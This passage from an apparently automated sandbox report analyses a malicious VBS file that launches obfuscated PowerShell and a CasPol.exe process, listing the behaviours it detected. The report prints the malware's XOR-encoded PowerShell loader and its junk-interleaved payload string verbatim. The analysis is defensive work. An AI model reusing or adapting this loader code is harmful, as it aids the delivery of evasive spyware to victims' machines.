CEFe2EmEGu8FiEShFBuFRaE PF M6 SBTu5 HCSl9AaETjE AFPo5 GECyFinF C2MiF o6FrF MEaiB D5GrD T2 QF N5 CEHyF BFSaE BEOv9 CFDi4HjECiBbrCSe8 BF ME VEFe9ciERiD FF S2PaF D8 SFKaESlE D8laB s5SvD S3 OFKoASuFIn5StFViFJaFRe7ReFSpESyCSk9 BF JE TF eDSo'Pa;Ov`$HyDPeeMomChoIngKo4So= pKFuoPan Fs PtLa0Pr2Af Ja'BuE o8 RE SFFlECh9ChFBr2TaF P5LaFNyC P'In;Sy`$PhD seBemPhoPag r5Kr= oKPooRen Ts Stbi0Ul2Po D' RD GC TFSyESkEAuFCoDra6 TF P4 PFStFHyE WE JFKr7 AF OEFlD a3NoFReA FFOr5 IF FF SF b7 NF HEYe'br;So`$PeDAmeImmKuoRagFo6In= iKSpoBnnDes Dt U0Co2Ti Fo'MaC S9 CC SF SCus8elE UB UFGeE SFRu8JeFSp2UnFMeA IFBo7MaDKa5 aFFlAUnFSe6FoF oE ABRh7viBNoB RDVu3BjF B2 RFBiFThFZaEMuDSi9 FEUd2 CCTu8HeFTi2 FF BC LB T7DrBSeBPiC wBWeESuEekFHa9 EFCo7NoFSp2MeFJo8Ce' S; M`$ SDAqeOrm PoBagSe7Af= CKPro DnResKat K0go2Re Un' TCRu9 PEOpEBaF C5 AE AF SF A2LaF D6StFAnEKoBBe7doB PBGlDSl6 IF PA WFRe5 UF fAAwJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Konst02 { param([String]$Paatryknin201); $Fonetik134 = ''; Write-Host $Fonetik134; Write-Host $Fonetik134; Write-Host $Fonetik134; $Bdel222 = New-Object byte[] ($Paatryknin201.Length / 2); For($Spag=0; $Spag -lt $Paatryknin201.Length; $Spag+=2){ $Bdel222[$Spag/2] = [convert]::ToByte($Paatryknin201.Substring($Spag, 2), 16); $Bdel222[$Spag/2] = ($Bdel222[$Spag/2] -bxor 155); } [String][System.Text.Encoding]::ASCII.GetString($Bdel222);}$Demog0=Konst02 'C8E2E8EFFEF6B5FFF7F7';$Demog1=Konst02 'D6F2F8E9F4E8F4FDEFB5CCF2F5A8A9B5CEF5E8FAFDFED5FAEFF2EDFED6FEEFF3F4FFE8';$Demog2=Konst02 'DCFEEFCBE9F4F8DAFFFFE9FEE8E8';$Demog3=Konst02 'C8E2E8EFFEF6B5C9EEF5EFF2F6FEB5D2F5EFFEE9F4EBC8FEE9EDF2F8FEE8B5D3FAF5FFF7FEC9FEFD';$Demog4=Konst02 'E8EFE9F2F5FC';$Demog5=Konst02 'DCFEEFD6F4FFEEF7FED3FAF5FFF7FE';$Demog6=Konst02 'C9CFC8EBFEF8F2FAF7D5FAF6FEB7BBD3F2FFFED9E2C8F2FCB7BBCBEEF9F7F2F8';$Demog7=Konst02 'C9EEF5EFF2F6FEB7BBD6FAF5FAFCFEFF';$Demog8=Konst02 'C9FEFDF7FEF8EFFEFFDFFEF7FEFCFAEFFE';$Demog9=Konst02 'D2F5D6FEF6F4E9E2D6F4FFEEF7FE';$Elevatorfo0=Konst02 'D6E2DFFEF7FEFCFAEFFECFE2EBFE';$Elevatorfo1=Konst02 'D8F7FAE8E8B7BBCBEEF9F7F2F8B7BBC8FEFAF7FEFFB7BBDAF5E8F2D8F7FAE8E8B7BBDAEEEFF4D8F7FAE8E8';$Elevatorfo2=Konst02 'D2F5EDF4F0FE';$Elevatorfo3=Konst02 'CBEEF9F7F2F8B7BBD3F2FFFED9E2C8F2FCB7BBD5FEECC8F7F4EFB7BBCDF2E9EFEEFAF7';$Elevatorfo4=Konst02 'CDF2E9EFEEFAF7DAF7F7F4F8';$Elevatorfo5=Konst02 'F5EFFFF7F7';$Elevatorfo6=Konst02 'D5EFCBE9F4EFFEF8EFCDF2E9EFEEFAF7D6FEF6F4E9E2';$Elevatorfo7=Konst02 'D2DEC3';$Elevatorfo8=Konst02 'C7';$Vattppe=Konst02 'CEC8DEC9A8A9';$Deviledj=Konst02 'D8FAF7F7CCF2F5FFF4ECCBE9F4F8DA';function fkp {Param ($Kominternf, $Back) ;$Faggrupp0 =Konst02 'BFCDFAE9F6F9BBA6BBB3C0DAEBEBDFF4F6FAF2F5C6A1A1D8EEE9E9FEF5EFDFF4F6FAF2F5B5DCFEEFDAE8E8FEF6F9F7F2FEE8B3B2BBE7BBCCF3FEE9FEB6D4F9F1FEF8EFBBE0BBBFC4B5DCF7F4F9FAF7DAE8E8FEF6F9F7E2D8FAF8F3FEBBB6DAF5FFBBBFC4B5D7F4F8FAEFF2F4F5B5C8EBF7F2EFB3BFDEF7FEEDFAEFF4E9FDF4A3B2C0B6AAC6B5DEEAEEFAF7E8B3BFDFFEF6F4FCABB2BBE6B2B5DCFEEFCFE2EBFEB3BFDFFEF6F4FCAAB2';&($Elevatorfo7) $Faggrupp0;$Faggrupp5 = Konst02 'BFDDF7FAFCFCFEF7BBA6BBBFCDFAE9F6F9B5DCFEEFD6FEEFF3F4FFB3BFDFFEF6F4FCA9B7BBC0CFE2EBFEC0C6C6BBDBB3BFDFFEF6F4FCA8B7BBBFDFFEF6F4FCAFB2B2';&($Elevatorfo7) $Faggrupp5;$Faggrupp1 = Konst02 'E9FEEFEEE9F5BBBFDDF7FAFCFCFEF7B5D2F5EDF4F0FEB3BFF5EEF7F7B7BBDBB3C0C8E2E8EFFEF6B5C9EEF5EFF2F6FEB5D2F5EFFEE9F4EBC8FEE9EDF2F8FEE8B5D3FAF5FFF7FEC9FEFDC6B3D5FEECB6D4F9F1FEF8EFBBC8E2E8EFFEF6B5C9EEF5EFF2F6FEB5D2F5EFFEE9F4EBC8FEE9EDF2F8FEE8B5D3FAF5FFF7FEC9FEFDB3B3D5FEECB6D4F9F1FEF8EFBBD2F5EFCBEFE9B2B7BBB3BFCDFAE9F6F9B5DCFEEFD6FEEFF3F4FFB3BFDFFEF6F4FCAEB2B2B5D2F5EDF4F0FEB3BFF5EEF7F7B7BBDBB3BFD0F4F6F2F5EFFEE9F5FDB2B2B2B2B7BBBFD9FAF8F0B2B2';&($Elevatorfo7) $Faggrupp1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Medicof,[Parameter(Position = 1)] [Type] $Medplanbli = [Void]);$FaggruJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile created: C:\Users\user\AppData\Roaming\0dg5hfk0.0lfJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nbk0ivnj.hea.ps1Jump to behavior
Source: classification engineClassification label: mal88.troj.spyw.evad.winVBS@13/8@5/4
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\97c421700557a331a31041b81ac3b698\mscorlib.ni.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1696:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4452:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:408:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1696:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4452:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:408:120:WilError_03
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Drawings_and_specifications.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Obfuscated command line found
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Boykott = """GeFAlu CnUbcLut Si GoAnn C TeK Do EnThsRat M0 r2Ef S{Sa Se Ch i Pap SaSarUnaVem S(Sk[JoS AtPar SivinEkg o]ab`$SePReaStaFotKrrKryUpkAmnSpiFonIm2 K0Th1 A)fl;Fi M`$ aFhao GnRee BtByiFlk S1Tr3Sa4Sc Se=Ka C'bo'Kr; T BoW Tr RiAstOve b-MoHBaoBrs dt C N`$raFGloSon Te St Si FkLe1Ea3 P4 N;Do LyW SrKai Ft ReKn-InHGro TssttKr Ou`$LaF IoBenExeCyt Ci Nkur1En3Ec4Ra; S DiWSrrAnirat me P-AdHTeo OsYat J K`$LdFFloOpn Fe Ct ZiNikCh1Sv3Te4st; D A Ha M is`$AaBHad ze BlEn2Un2Su2 E Po=Pa FiNDreRiw c-BuOEnbVrj Ie BcSct U EtbTeypat PeRe[en]di Sq( a`$foPUnaSwa Ot Vr UyTik Nn Hi DnNu2 T0Ou1Ol.RaL Ee unOvghat Rh D A/Vi af2 S)Ta;co La In K uFShoAfr A( C`$SiSStpTraIngUd=To0Ad; K I`$UlS Pp UaTrgJa W- SlUnt B Th`$ UPSua TaIct BrUpyAak SnstiStnCr2 N0No1Ro.SeLsceBrnBeg RtUnhRe;al T`$ cS UpTiapagSe+Br=To2Ol) D{ko T Ca Lo qu L Ma S S`$ TB AdGlesklfl2Dr2Br2 C[ C`$FoSPupfoaargHo/ O2 B] v Ra=Me R[ EczuoPunThvUde ErAltFo]Sj:St: BT PoKoB Hy Mt Fe S(Su`$NoPKiaFiaRotInr RySnkDrnPri SnFo2Sk0 K1 S.SySBeuPab Bs HtUpr Ii UnAkgAd(De`$BrSSup UaRigIn,Ra T2El) o, C Tr1 I6 L) N;Pa S Ho`$ FBMadEneStlAp2 p2 a2Co[Ve`$RtS Hp Ua GgBo/ S2Gi]Sp Dr=bl M(po`$UdBdad We Cl q2 N2Ec2Sk[Du`$ SS Tp da Eg S/Hj2 H] S B- Sb Bx FoNorUn T1Ci5De5An)Ek;He Ma G Ba Op}du B[ToSHotPerBli TnPogRe]Do[ExS Sy bs St ReEumCo. PT VeTaxTotSa. CESlnCicBooKedAni SnStg S] F: I: SA PSsmCFrISaISt. TG CeantCeSEltAdrMiiMun KgUn(Ch`$ tBOmddie Ol G2 A2Tr2 E) E;ch}sc`$seD SeSkmHeoPog C0Ar=GuK WoTvnThs Ht M0Fo2 S Mo'GrC F8PoEEu2 OERa8SoE OFWbFQuEFrFSh6 CBHa5 MF mF JFWe7TuF H7Mi'ud; H`$ AD KeRamInoXeg S1Re=ShKDioMonFhs Mt M0 K2 M Ju' SDTa6 RFAf2AlF C8MeEHa9 RFCo4 IEBl8 SF U4 AF SDpeEEpF SBLd5 LC FCFoFDe2HoFEl5TaAKl8EmAHi9paBGi5StC TE FFHy5 RE b8ArFUdA SFMuDRdFsuE LD R5smF hA CEDkF FFFl2 PE BDInFNoEFeDPi6 UFCeEIdE SFKoF O3EsF a4SqFWaFBlE P8le'Ro;be`$AfDHleScmDeoMog M2 c=SoKIno NnBrs BtSi0af2Om Op' VDRaCPrFElE HE OFCaCSeB JE A9KrF I4MaFFo8 LDSlA KFWaFPiF mFSyESt9NoFKoECoEVa8 VEEw8 V'Di;Ra`$ PD UeGumAko Sg L3 I= SK ao en Rs KtRi0La2Un K' SCBo8 CEFe2EmEGu8FiEShFBuFRaE PF M6 SBTu5 HCSl9AaETjE AFPo5 GECyFinF C2MiF o6FrF MEaiB D5GrD T2 QF N5 CEHyF BFSaE BEOv9 CFDi4HjECiBbrCSe8 BF ME VEFe9ciERiD FF S2PaF D8 SFKaESlE D8laB s5SvD S3 OFKoASuFIn5StFViFJaFRe7ReFSpESyCSk9 BF JE TF eDSo'Pa;Ov`$HyDPeeMomChoIngKo4So= pKFuoPan Fs PtLa0Pr2Af Ja'BuE o8 RE SFFlECh9ChFBr2TaF P5LaFNyC P'In;Sy`$PhD seBemPhoPag r5Kr= oKPooRen Ts Stbi0Ul2Po D' RD GC TFSyESkEAuFCoDra6 TF P4 PFStFHyE WE JFKr7 AF OEFlD a3NoFReA FFOr5 IF FF SF b7 NF HEYe'br;So`$PeDAmeImmKuoRagFo6In= iKSpoBnnDes Dt U0Co2Ti Fo'MaC S9 CC SF SCus8elE UB UFGeE SFRu8JeFSp2UnFMeA IFBo7MaDKa5 aFFlAUnFSe6FoF oE ABRh7viBNoB RDVu3BjF B2 RFBiFThFZaEMuDSi9 FEUd2 CCTu8HeFTi2 FF BC LB T7DrBSeBPiC wBWeESuEekFHa9 EFCo7NoFSp2MeFJo8Ce' S; M`$ SDAqeOrm PoBagSe7Af= CKPro DnResKat K0go2Re Un' TCRu9 PEOpEBaF C5 AE AF SF A2LaF D6StFAnEKoBBe7doB PBGlDSl6 IF PA WFRe5 UF fAAw
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Boykott = """GeFAlu CnUbcLut Si GoAnn C TeK Do EnThsRat M0 r2Ef S{Sa Se Ch i Pap SaSarUnaVem S(Sk[JoS AtPar SivinEkg o]ab`$SePReaStaFotKrrKryUpkAmnSpiFonIm2 K0Th1 A)fl;Fi M`$ aFhao GnRee BtByiFlk S1Tr3Sa4Sc Se=Ka C'bo'Kr; T BoW Tr RiAstOve b-MoHBaoBrs dt C N`$raFGloSon Te St Si FkLe1Ea3 P4 N;Do LyW SrKai Ft ReKn-InHGro TssttKr Ou`$LaF IoBenExeCyt Ci Nkur1En3Ec4Ra; S DiWSrrAnirat me P-AdHTeo OsYat J K`$LdFFloOpn Fe Ct ZiNikCh1Sv3Te4st; D A Ha M is`$AaBHad ze BlEn2Un2Su2 E Po=Pa FiNDreRiw c-BuOEnbVrj Ie BcSct U EtbTeypat PeRe[en]di Sq( a`$foPUnaSwa Ot Vr UyTik Nn Hi DnNu2 T0Ou1Ol.RaL Ee unOvghat Rh D A/Vi af2 S)Ta;co La In K uFShoAfr A( C`$SiSStpTraIngUd=To0Ad; K I`$UlS Pp UaTrgJa W- SlUnt B Th`$ UPSua TaIct BrUpyAak SnstiStnCr2 N0No1Ro.SeLsceBrnBeg RtUnhRe;al T`$ cS UpTiapagSe+Br=To2Ol) D{ko T Ca Lo qu L Ma S S`$ TB AdGlesklfl2Dr2Br2 C[ C`$FoSPupfoaargHo/ O2 B] v Ra=Me R[ EczuoPunThvUde ErAltFo]Sj:St: BT PoKoB Hy Mt Fe S(Su`$NoPKiaFiaRotInr RySnkDrnPri SnFo2Sk0 K1 S.SySBeuPab Bs HtUpr Ii UnAkgAd(De`$BrSSup UaRigIn,Ra T2El) o, C Tr1 I6 L) N;Pa S Ho`$ FBMadEneStlAp2 p2 a2Co[Ve`$RtS Hp Ua GgBo/ S2Gi]Sp Dr=bl M(po`$UdBdad We Cl q2 N2Ec2Sk[Du`$ SS Tp da Eg S/Hj2 H] S B- Sb Bx FoNorUn T1Ci5De5An)Ek;He Ma G Ba Op}du B[ToSHotPerBli TnPogRe]Do[ExS Sy bs St ReEumCo. PT VeTaxTotSa. CESlnCicBooKedAni SnStg S] F: I: SA PSsmCFrISaISt. TG CeantCeSEltAdrMiiMun KgUn(Ch`$ tBOmddie Ol G2 A2Tr2 E) E;ch}sc`$seD SeSkmHeoPog C0Ar=GuK WoTvnThs Ht M0Fo2 S Mo'GrC F8PoEEu2 OERa8SoE OFWbFQuEFrFSh6 CBHa5 MF mF JFWe7TuF H7Mi'ud; H`$ AD KeRamInoXeg S1Re=ShKDioMonFhs Mt M0 K2 M Ju' SDTa6 RFAf2AlF C8MeEHa9 RFCo4 IEBl8 SF U4 AF SDpeEEpF SBLd5 LC FCFoFDe2HoFEl5TaAKl8EmAHi9paBGi5StC TE FFHy5 RE b8ArFUdA SFMuDRdFsuE LD R5smF hA CEDkF FFFl2 PE BDInFNoEFeDPi6 UFCeEIdE SFKoF O3EsF a4SqFWaFBlE P8le'Ro;be`$AfDHleScmDeoMog M2 c=SoKIno NnBrs BtSi0af2Om Op' VDRaCPrFElE HE OFCaCSeB JE A9KrF I4MaFFo8 LDSlA KFWaFPiF mFSyESt9NoFKoECoEVa8 VEEw8 V'Di;Ra`$ PD UeGumAko Sg L3 I= SK ao en Rs KtRi0La2Un K' SCBo8 CEFe2EmEGu8FiEShFBuFRaE PF M6 SBTu5 HCSl9AaETjE AFPo5 GECyFinF C2MiF o6FrF MEaiB D5GrD T2 QF N5 CEHyF BFSaE BEOv9 CFDi4HjECiBbrCSe8 BF ME VEFe9ciERiD FF S2PaF D8 SFKaESlE D8laB s5SvD S3 OFKoASuFIn5StFViFJaFRe7ReFSpESyCSk9 BF JE TF eDSo'Pa;Ov`$HyDPeeMomChoIngKo4So= pKFuoPan Fs PtLa0Pr2Af Ja'BuE o8 RE SFFlECh9ChFBr2TaF P5LaFNyC P'In;Sy`$PhD seBemPhoPag r5Kr= oKPooRen Ts Stbi0Ul2Po D' RD GC TFSyESkEAuFCoDra6 TF P4 PFStFHyE WE JFKr7 AF OEFlD a3NoFReA FFOr5 IF FF SF b7 NF HEYe'br;So`$PeDAmeImmKuoRagFo6In= iKSpoBnnDes Dt U0Co2Ti Fo'MaC S9 CC SF SCus8elE UB UFGeE SFRu8JeFSp2UnFMeA IFBo7MaDKa5 aFFlAUnFSe6FoF oE ABRh7viBNoB RDVu3BjF B2 RFBiFThFZaEMuDSi9 FEUd2 CCTu8HeFTi2 FF BC LB T7DrBSeBPiC wBWeESuEekFHa9 EFCo7NoFSp2MeFJo8Ce' S; M`$ SDAqeOrm PoBagSe7Af= CKPro DnResKat K0go2Re Un' TCRu9 PEOpEBaF C5 AE AF SF A2LaF D6StFAnEKoBBe7doB PBGlDSl6 IF PA WFRe5 UF fAAwJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD2BDD0625 pushad ; retf 7_2_00007FFD2BDD05ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD2BDD5D85 push eax; ret 7_2_00007FFD2BDD5DAD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD2BDD02AD pushad ; retf 7_2_00007FFD2BDD05ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD2BDD2295 push E95AD693h; ret 7_2_00007FFD2BDD2539

Persistence and Installation Behavior

barindex
Uses ipconfig to lookup or modify the Windows network settings
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /flushdns
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
